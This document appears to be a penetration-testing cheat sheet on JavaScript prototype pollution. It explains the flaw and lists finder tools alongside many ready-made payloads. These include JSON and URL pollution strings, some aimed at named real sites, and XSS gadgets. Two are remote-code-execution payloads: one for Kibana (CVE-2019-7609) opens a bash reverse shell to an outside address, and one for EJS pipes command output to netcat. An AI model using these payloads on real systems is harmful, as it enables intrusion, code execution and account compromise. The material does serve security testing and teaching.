Prototype Pollution

Prototype pollution is a type of vulnerability that occurs in JavaScript when properties of Object.prototype are modified. This is particularly risky because JavaScript objects are dynamic and we can add properties to them at any time. Also, almost all objects in JavaScript inherit from Object.prototype, making it a potential attack vector.

Tools

yeswehack/pp-finder - Help you find gadget for prototype pollution exploitation
yuske/silent-spring - Prototype Pollution Leads to Remote Code Execution in Node.js
yuske/server-side-prototype-pollution - Server-Side Prototype Pollution gadgets in Node.js core code and 3rd party NPM packages
BlackFan/client-side-prototype-pollution - Prototype Pollution and useful Script Gadgets
portswigger/server-side-prototype-pollution - Burp Suite Extension detectiong Prototype Pollution vulnerabilities
msrkp/PPScan

Labs

Exploit

In JavaScript, prototypes are what allow objects to inherit features from other objects. If an attacker is able to add or modify properties of Object.prototype, they can essentially affect all objects that inherit from that prototype, potentially leading to various kinds of security risks.

var myDog = new Dog();

// Points to the function "Dog"
myDog.constructor;

// Points to the class definition of "Dog"
myDog.constructor.prototype;
myDog.__proto__;
myDog["__proto__"];

Examples

Imagine that an application uses an object to maintain configuration settings, like this:
```
let config = {
    isAdmin: false
};
```
An attacker might be able to add an isAdmin property to Object.prototype, like this:
```
Object.prototype.isAdmin = true;
```

Manual Testing

ExpressJS: { "__proto__":{"parameterLimit":1}} + 2 parameters in GET request, at least 1 must be reflected in the response.
ExpressJS: { "__proto__":{"ignoreQueryPrefix":true}} + ??foo=bar
ExpressJS: { "__proto__":{"allowDots":true}} + ?foo.bar=baz
Change the padding of a JSON response: { "__proto__":{"json spaces":" "}} + {"foo":"bar"}, the server should return {"foo": "bar"}
Modify CORS header responses: { "__proto__":{"exposedHeaders":["foo"]}}, the server should return the header Access-Control-Expose-Headers.
Change the status code: { "__proto__":{"status":510}}

Prototype Pollution via JSON input

You can access the prototype of any object via the magic property __proto__. The JSON.parse() function in JavaScript is used to parse a JSON string and convert it into a JavaScript object. Typically it is a sink function where prototype pollution can happen.

{
    "__proto__": {
        "evilProperty": "evilPayload"
    }
}

Asynchronous payload for NodeJS.

{
  "__proto__": {
    "argv0":"node",
    "shell":"node",
    "NODE_OPTIONS":"--inspect=payload\"\".oastify\"\".com"
  }
}

Polluting the prototype via the constructor property instead.

{
    "constructor": {
        "prototype": {
            "foo": "bar",
            "json spaces": 10
        }
    }
}

Prototype Pollution in URL

Example of Prototype Pollution payloads found in the wild.

https://victim.com/#a=b&__proto__[admin]=1
https://example.com/#__proto__[xxx]=alert(1)
http://server/servicedesk/customer/user/signup?__proto__.preventDefault.__proto__.handleObj.__proto__.delegateTarget=%3Cimg/src/onerror=alert(1)%3E
https://www.apple.com/shop/buy-watch/apple-watch?__proto__[src]=image&__proto__[onerror]=alert(1)
https://www.apple.com/shop/buy-watch/apple-watch?a[constructor][prototype]=image&a[constructor][prototype][onerror]=alert(1)

Prototype Pollution Exploitation

Depending if the prototype pollution is executed client (CSPP) or server side (SSPP), the impact will vary.

Remote Command Execution: RCE in Kibana (CVE-2019-7609)

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

Remote Command Execution: RCE using EJS gadgets

{
    "__proto__": {
        "client": 1,
        "escapeFunction": "JSON.stringify; process.mainModule.require('child_process').exec('id | nc localhost 4444')"
    }
}

Reflected XSS: Reflected XSS on www.hackerone.com via Wistia embed code - #986386
Client-side bypass: Prototype pollution – and bypassing client-side HTML sanitizers
Deny of Service

Prototype Pollution Payloads

Object.__proto__["evilProperty"]="evilPayload"
Object.__proto__.evilProperty="evilPayload"
Object.constructor.prototype.evilProperty="evilPayload"
Object.constructor["prototype"]["evilProperty"]="evilPayload"
{"__proto__": {"evilProperty": "evilPayload"}}
{"__proto__.name":"test"}
x[__proto__][abaeead] = abaeead
x.__proto__.edcbcab = edcbcab
__proto__[eedffcb] = eedffcb
__proto__.baaebfc = baaebfc
?__proto__[test]=test

Prototype Pollution Gadgets

A "gadget" in the context of vulnerabilities typically refers to a piece of code or functionality that can be exploited or leveraged during an attack. When we talk about a "prototype pollution gadget," we're referring to a specific code path, function, or feature of an application that is susceptible to or can be exploited through a prototype pollution attack.

Either create your own gadget using part of the source with yeswehack/pp-finder, or try to use already discovered gadgets yuske/server-side-prototype-pollution / BlackFan/client-side-prototype-pollution.